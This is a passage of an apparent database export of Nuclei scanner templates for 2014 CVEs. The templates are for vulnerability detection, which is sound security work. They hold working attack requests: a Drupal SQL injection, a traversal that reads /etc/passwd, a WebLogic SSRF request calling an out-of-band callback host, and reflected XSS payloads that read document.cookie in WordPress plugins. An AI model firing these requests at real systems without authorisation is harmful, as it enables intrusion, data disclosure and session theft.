\"http\"\n# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950", "hash": "91945361c96863527a99cc64718ecfce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f16" }, "name": "CVE-2014-3704.yaml", "content": "id: CVE-2014-3704\n\ninfo:\n name: Drupal SQL Injection\n author: princechaddha\n severity: high\n description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database.\n remediation: Upgrade to Drupal core 7.32 or later.\n reference:\n - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3704\n - https://www.drupal.org/SA-CORE-2014-005\n - https://www.exploit-db.com/exploits/34984\n - https://www.exploit-db.com/exploits/34992\n - https://www.exploit-db.com/exploits/34993\n - https://www.exploit-db.com/exploits/35150\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-3704\n cwe-id: CWE-89\n epss-score: 0.97537\n epss-percentile: 0.99992\n cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: drupal\n product: drupal\n shodan-query: http.component:\"drupal\"\n tags: cve2014,cve,edb,drupal,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/?q=node&destination=node\"\n\n body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PDOException\"\n - '{{md5({{num}})}}'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402207af10a42ac3fac82b8537fcd02ef03a3d6d1c789570c336dd960af2488b7656a02200bf8bf6552331293f0e50b7c92c5874a81bc4df67abaae00fa0bd4042a8ea2fe:922c64590222798bb761d5b6d8e72950", "hash": "0739356f6eefbac58d11166623bd9caa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f17" }, "name": "CVE-2014-3744.yaml", "content": "id: CVE-2014-3744\n\ninfo:\n name: Node.js st module Directory Traversal\n author: geeknik\n severity: high\n description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3744\n - https://github.com/advisories/GHSA-69rr-wvh9-6c4q\n - https://snyk.io/vuln/npm:st:20140206\n - https://nodesecurity.io/advisories/st_directory_traversal\n - http://www.openwall.com/lists/oss-security/2014/05/13/1\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2014-3744\n cwe-id: CWE-22\n epss-score: 0.00672\n epss-percentile: 0.77635\n cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nodejs\n product: node.js\n tags: cve2014,cve,lfi,nodejs,st\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950", "hash": "7da9466146de1ab9b114b8d8383a1355", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f18" }, "name": "CVE-2014-4210.yaml", "content": "id: CVE-2014-4210\n\ninfo:\n name: Oracle Weblogic - Server-Side Request Forgery\n author: princechaddha\n severity: medium\n description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.\n remediation: |\n Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability\n reference:\n - https://www.oracle.com/security-alerts/cpujul2014.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4210\n - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\n - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\n - http://seclists.org/fulldisclosure/2014/Dec/23\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4210\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.96955\n epss-percentile: 0.9967\n cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: fusion_middleware\n shodan-query: title:\"Weblogic\"\n tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"Search public registries\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950", "hash": "339bbb6c8242bc016472c4d536af07f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f19" }, "name": "CVE-2014-4513.yaml", "content": "id: CVE-2014-4513\n\ninfo:\n name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4513\n - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-4513\n cwe-id: CWE-79\n epss-score: 0.00145\n epss-percentile: 0.50288\n cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: activehelper\n product: activehelper_livehelp_live_chat\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/activehelper-livehelp\"\n tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'ActiveHelper LiveHelp Live Chat'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c70973326dc4da5c4130c3180aa50e32ccedebe17dfc3e2135ce622c7d93307b022029ca8cebdadfded9c3a554c78cf22248ac02a412d228fa50c9063bc9be53c4bd:922c64590222798bb761d5b6d8e72950", "hash": "34f1a8a6a193fcd1f2e2b2abae1b3f9e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1a" }, "name": "CVE-2014-4535.yaml", "content": "id: CVE-2014-4535\n\ninfo:\n name: Import Legacy Media <= 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4535\n - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4535\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48664\n cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: import_legacy_media_project\n product: import_legacy_media\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/import-legacy-media/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c947aed3c99938dc952b322d6f2b1729438092660b31ff1c90783264a24cb01a0220265888536b4943a2204bc4141bffa43c67384e2b3be7f962cbf86d397dde8d17:922c64590222798bb761d5b6d8e72950", "hash": "ed3ae07f948d5a003d27ce2034d03347", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1b" }, "name": "CVE-2014-4536.yaml", "content": "id: CVE-2014-4536\n\ninfo:\n name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4536\n - http://wordpress.org/plugins/infusionsoft/changelog\n - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4536\n cwe-id: CWE-79\n epss-score: 0.00149\n epss-percentile: 0.50857\n cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: katz\n product: infusionsoft_gravity_forms\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Infusionsoft'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950", "hash": "c3dc1e77d1af5f97825172a11e96efb0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1c" }, "name": "CVE-2014-4539.yaml", "content": "id: CVE-2014-4539\n\ninfo:\n name: Movies <= 0.6 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4539\n - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4539\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: movies_project\n product: movies\n framework: wordpress\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/movies/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Movies ='\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950", "hash": "179d064ee35fb5da60a47585b0ab96b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1d" }, "name": "CVE-2014-4544.yaml", "content": "id: CVE-2014-4544\n\ninfo:\n name: Podcast Channels < 0.28 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4544\n - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4544\n cwe-id: CWE-79\n epss-score: 0.00118\n epss-percentile: 0.45595\n cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: podcast_channels_project\n product: podcast_channels\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201b012a51490d4c5d00cbed0728997b52b855ebf28d0bc90d673677e88eda9db4022100d96a4915d878a3c91ec2e3a7fc2baa07140914b1c5549999e941d5e0d9beae3e:922c64590222798bb761d5b6d8e72950", "hash": "f4e42049c7d0bb7d8d20170aba9f62c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1e" }, "name": "CVE-2014-4550.yaml", "content": "id: CVE-2014-4550\n\ninfo:\n name: Shortcode Ninja <= 1.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.\n impact: |\n Allows remote attackers to inject arbitrary web script or HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4550\n - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4550\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: visualshortcodes\n product: ninja\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/shortcode-ninja\"\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/shortcode-ninja/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202d3cefb43338cd1d7fdec604f7e6f35630a7efd4c31ced1daf4d5d06bda5fbf3022100bd9e9e1c3b3766f433b39af8bb873b97144e038899c49bd8bae8a4cfdc884985:922c64590222798bb761d5b6d8e72950", "hash": "4ed661531756ec7beebd6abc112ccdbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1f" }, "name": "CVE-2014-4558.yaml", "content": "id: CVE-2014-4558\n\ninfo:\n name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4558\n - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4558\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cybercompany\n product: swipehq-payment-gateway-woocommerce\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/swipehq-payment-gateway-woocommerce/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E \"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950", "hash": "4633c5062fa5dd36ed8f1c2b0658d177", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f20" }, "name": "CVE-2014-4561.yaml", "content": "id: CVE-2014-4561\n\ninfo:\n name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information.\n remediation: |\n Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4561\n - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4561\n cwe-id: CWE-79\n epss-score: 0.00098\n epss-percentile: 0.40364\n cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ultimate-weather_project\n product: ultimate-weather\n framework: wordpress\n tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ultimate Weather'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950", "hash": "37a15411867ef405aa6b68d620de8ccb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f21" }, "name": "CVE-2014-4592.yaml", "content": "id: CVE-2014-4592\n\ninfo:\n name: WP Planet <= 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.\n remediation: |\n Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4592\n - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4592\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: czepol\n product: wp-planet\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-planet\"\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - \"WP Planet\"\n\n - type: word\n part: body_2\n words:\n - \"\"\n\n - type: word\n part: header_2\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a2bd4ee7dd4410fcf6088eb1ea98117e6cb1d07778ec987702193ec58f1a32d2022071f4dedaed29b1e6c680e09b1e91688a875574e60a2b29ceb986f8ee3ec5d2fe:922c64590222798bb761d5b6d8e72950", "hash": "8739feb3fe13bfec7fca8803653d4829", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f22" }, "name": "CVE-2014-4940.yaml", "content": "id: CVE-2014-4940\n\ninfo:\n name: WordPress Plugin Tera Charts - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4940\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=\n - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/\n - 